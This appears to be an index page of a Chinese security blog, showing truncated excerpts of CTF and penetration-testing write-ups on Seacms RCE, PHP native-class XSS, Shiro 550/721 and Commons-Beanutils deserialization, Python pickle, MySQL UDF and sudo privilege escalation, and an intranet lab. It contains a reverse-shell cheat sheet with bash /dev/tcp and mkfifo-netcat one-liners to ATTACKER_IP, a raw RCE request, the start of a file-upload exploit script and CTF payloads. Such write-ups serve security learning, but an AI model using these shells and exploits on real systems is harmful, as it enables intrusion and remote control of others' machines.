海洋cms
flag1 fscan扫描完,找个poc rce 1234567891011121314POST /search.php HTTP/1.1Host: 113.45.161.52:89Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 Edg/142.0.0.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://113.45.161.52:89/index.phpAccept-Encoding: gzip, deflate, ...
php原生类
学习一下php原生类 常用的php原生类 Error Exception SoapClient Directorylterator SimpleXMLElement ZipArchive SplFileObject 一个一个来跟着大佬博客学习 使用Error/Exception内置类进行xss内置类Error 使用于php7 开启报错 Error类是 php 的一个内置类,用于自动自定义一个 Error,在 php7 的环境下可能会造成一个 xss 漏洞,因为它内置有一个 __toString() 的方法,常用于PHP 反序列化中。如果有个 POP 链走到一半就走不通了,不如尝试利用这个来做一个 xss,其实还是有好一些 cms 会选择直接使用 echo 的写法,当 PHP 对象被当作一个字符串输出或使用时候(如echo object的时候)会触发 __toString 方法,这是一种挖洞的新思路。 对内置类Error xss的使用 123456<?php$a = unserialize($_POST['cmd']); //反序列化成对象...
shiro721
前言shiro721是shiro550更新过后的一个版本,不同于shiro550,它使用的是动态密钥对Cookie值rememberMe进行的加密,这样就避免了攻击者的攻击,但是真的能避免吗?既然有这个漏洞,那就说明无法避免,主要还是因为shiro使用了AES-CBC的加密方式,这时我们就可以使用Padding Oracle Attack的方法(不需要密钥也可以伪造密文)进行攻击。 环境准备https://github.com/jas502n/SHIRO-721/blob/master/samples-web-1.4.1.war 下载war包,解压之后打开这个项目将cc换成3.2.1的版本 创建一个新的项目 踩坑点:不要使用jdk版本8u65,版本太低会报错误 将刚刚解压的war包里的内容放入webapp中 依赖的添加,在lib下 添加tomcat启动(记得工件) 最后启动环境,我们可以看到如下界面 漏洞利用使用ysoserial工具生成URLDNS的payload 1java -jar ysoserial.jar URLDNS http://56db4471.log....
CB链
环境准备参考:https://www.cnblogs.com/1vxyz/p/17588722.html 依赖 1234567891011121314151617<dependencies> <dependency> <groupId>commons-beanutils</groupId> <artifactId>commons-beanutils</artifactId> <version>1.8.3</version> </dependency> <dependency> <groupId>commons-logging</groupId> <artifactId>commons-logging</artifactId> <version>1.2</version> </de...
反弹shell
这里记录一下反弹shell的方法,方便以后的使用 参考https://mp.weixin.qq.com/s/hTGuZ7kdh7K4mToGdbogvA 基于bash/Terminal的反弹shell 经典的TCP反弹 1bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1 使用文件描述符 1exec 5<>/dev/tcp/ATTACKER_IP/PORT; cat <&5 | while read line; do $line 2>&5 >&5; done 使用管道 1mkfifo /tmp/f; /bin/sh -i < /tmp/f 2>&1 | nc ATTACKER_IP PORT > /tmp/f UDP反弹 1bash -i >& /dev/udp/ATTACKER_IP/PORT 0>&1 反弹到多个端口 1bash -i >& /dev/tcp/A...
pickle反序列化
前言参考:https://j1rry-learn.github.io/posts/ctf%E9%A2%98%E5%9E%8B-pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E8%BF%9B%E9%98%B6%E5%88%A9%E7%94%A8/ pickle模块基于python主要牵扯到两个函数,一个是dumps另一个是loads,类似于emmmm,php的serialize和unserialize方法,危害还是很大的,可以直接进行命令执行。 知识点 pickle.dumps(obj[, protocol]) 1234功能:将obj对象序列化为string形式,而不是存入文件中。参数:obj:想要序列化的obj对象。protocal:如果该项省略,则默认为0。如果为负值或HIGHEST_PROTOCOL,则使用最高的协议版本。 pickle.loads(string) 123功能:从string中读出序列化前的obj对象。参数:string:文件名称。 总结来说,dumps是序列化成一个字符串,而loads是反序列化成一个对象。 ...
shiro550
前言shiro550漏洞的根本原因是因为使用固定的key进行加密 环境搭建jdk8u65(我们当时调cc链的时候已经准备好了) Tomcat8 https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.81/bin/ 下载好之后解压缩,然后进入bin点击startup.bat,如果一闪而过,那就用在命令行中去运行它,看看缺什么环境变量(一般是)然后添加这个环境变量就行了。 最后运行在本地的8080端口 shiro1.2.4 漏洞影响的版本:shiro<=1.2.4 靶场环境搭建 我们先下载p神的项目 https://github.com/phith0n/JavaThings/tree/master/shirodemo 使用idea打开项目 在这里添加我们刚刚下载好的tomcat 在进入项目结构中添加工件 最后设置运行与调试 点击login.jsp运行,配置好路由是这个界面 至此环境搭配完成 shiro550分析由于 Shiro 使用的 RememberMe 功能通过 AES 加密的 C...
initial
flag1第一步用tscan扫描指纹发现是thinkphp 然后直接getshell 蚁剑连接后sudo -l发现mysql提权 1sudo mysql -e '\! find / -type f -name "*flag*" 2>/dev/null' 然后得到flag1 1flag{60b53231- flag2传入fscan来扫描一下内网 1fscan -h 然后用stowaway做一个内网穿透 弱口令可以进入到这里 然后是信呼协同办公2.2版本的文件上传 exp 123456789101112131415161718192021222324252627282930313233import requestssession = requests.session()url_pre = 'http://url/'url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'ur...
udf提权
学习文章:https://www.sqlsec.com/2020/11/mysql.html#UDF-%E6%8F%90%E6%9D%83 基本概念:自定义函数,是数据库功能的一种扩展。用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL 语句中调用,就像调用本机函数 version () 等方便。 复现动态连接库如果是MySQL >= 5.1的版本,必须把UDF的动态链接库文件放置于Mysql安装目录下的lib\plugin文件夹下才能创建自定义函数, sqlmap和Metasploit里都自带了对应系统的动态链接库文件 sqlmap的UDF动态链接库文件位置 1/usr/share/sqlmap/data/udf/mysql sqlmap自带的udf动态链接库因为防止被误杀,都带着编码,不过它也给出了编码工具 cloak.py 1234567891011121314pwd /usr/s...
NSSCTF秋季新生赛
webSIGN IN! 考了三个请求头 ezez_include 有文件上传的地方,也有文件包含的点,那就是上传一个代码的图片,包含一下就行 isAdmin 伪造即可 123456{ "name": "guest", "role": "admin", "isAdmin": true, "admin": true} DANGEROUS TRIAL 这里有一个字典,用它的字典去爆破 12cat=114514a&Slime=data://text/plain;base64,cmltdXJ1NSS[CTF.LOVE=highlight_file(array_rand(array_flip(scandir(dirname(chdir(dirname(dirname(dirname(getcwd()))))))))); 我是签到 file_get_contents的rce 直接用脚本就行了 我是复读机信息泄露robo...